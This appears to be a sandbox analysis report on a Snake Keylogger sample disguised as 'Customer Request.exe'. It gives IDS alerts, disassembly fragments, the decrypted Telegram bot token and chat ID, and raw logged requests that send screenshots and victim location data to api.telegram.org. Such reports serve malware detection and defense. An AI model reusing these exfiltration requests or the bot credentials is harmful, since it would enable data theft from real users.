Source: Customer Request.exe | ReversingLabs: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack | String decryptor: (empty string)
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack | String decryptor: 7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack | String decryptor: 5007084465

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Customer Request.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49713 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49722 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50014 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50024 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50087 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50088 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50089 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50090 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50092 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50093 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50094 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50095 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50096 version: TLS 1.2
Source: Customer Request.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: rqSA.pdbSHA256 | source: Customer Request.exe, gCFuOglEso.exe.0.dr
Source: Binary string: rqSA.pdb | source: Customer Request.exe, gCFuOglEso.exe.0.dr
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 056056F1h | 10_2_05605440
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 05604571h | 10_2_056042C0
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 05603157h | 10_2_05602F78
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 05603AE1h | 10_2_05602F78
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 05605CB8h | 10_2_056058A0
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 10_2_05602478
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 0560FA11h | 10_2_0560F768
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 056049D1h | 10_2_05604720
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 10_2_05602C9D
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 05605291h | 10_2_05604FE0
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 05605CB8h | 10_2_056058A2
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 05605CB8h | 10_2_05605BE6
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 05604E31h | 10_2_05604B80
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 10_2_05602ABB
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-4Ch] | 10_2_06C9D710
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 10_2_06C99418
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-4Ch] | 10_2_06C9BF6C
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 10_2_07242E74
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 0724675Eh | 10_2_072465A8
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then jmp 0724675Eh | 10_2_072466AD
Source: C:\Users\user\Desktop\Customer Request.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 10_2_07245E85
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 4x nop then jmp 06E35356h | 15_2_06E351A1
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 15_2_06E34E35
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 4x nop then jmp 06E35356h15_2_06E352A5
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]15_2_06E353A8

                  Networking

                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49748 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49743 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49743 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49749 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49750 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49751 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49747 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49747 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49752 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49754 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49755 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49757 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49756 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49759 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49753 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49760 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49761 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49762 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49765 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49766 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49767 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49768 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49764 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49758 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49769 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49770 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49771 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49772 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49773 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49774 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49775 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49776 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49778 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49779 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49780 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49781 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49782 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49783 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49784 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49777 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49786 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49798 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49803 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49815 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49816 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49823 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49787 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49846 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49837 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49850 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49858 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49862 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49873 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49874 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49887 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49834 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49895 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49908 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49922 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49894 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49912 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49924 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49935 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49936 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49947 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49949 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49960 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49961 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49886 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49972 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49996 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50002 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50091 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50098 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50096 -> 149.154.167.220:443
                  Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50097 -> 149.154.167.220:443
                  Source: unknown | DNS query: name: api.telegram.org
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd5190d8bacacd | Host: api.telegram.org | Content-Length: 570 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd51c42e28e955 | Host: api.telegram.org | Content-Length: 570 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd52005f413c6d | Host: api.telegram.org | Content-Length: 708860
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd5215a056c53e | Host: api.telegram.org | Content-Length: 708860
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd5226d6d4bb7a | Host: api.telegram.org | Content-Length: 708860
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd523aa40ba3cd | Host: api.telegram.org | Content-Length: 708860 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd524bbee8cea5 | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd525e1c589f1c | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd5236b62b17e5 | Host: api.telegram.org | Content-Length: 708871
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd5271ba01f352 | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd524bc8e55afb | Host: api.telegram.org | Content-Length: 708871
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd5287e31eb585 | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
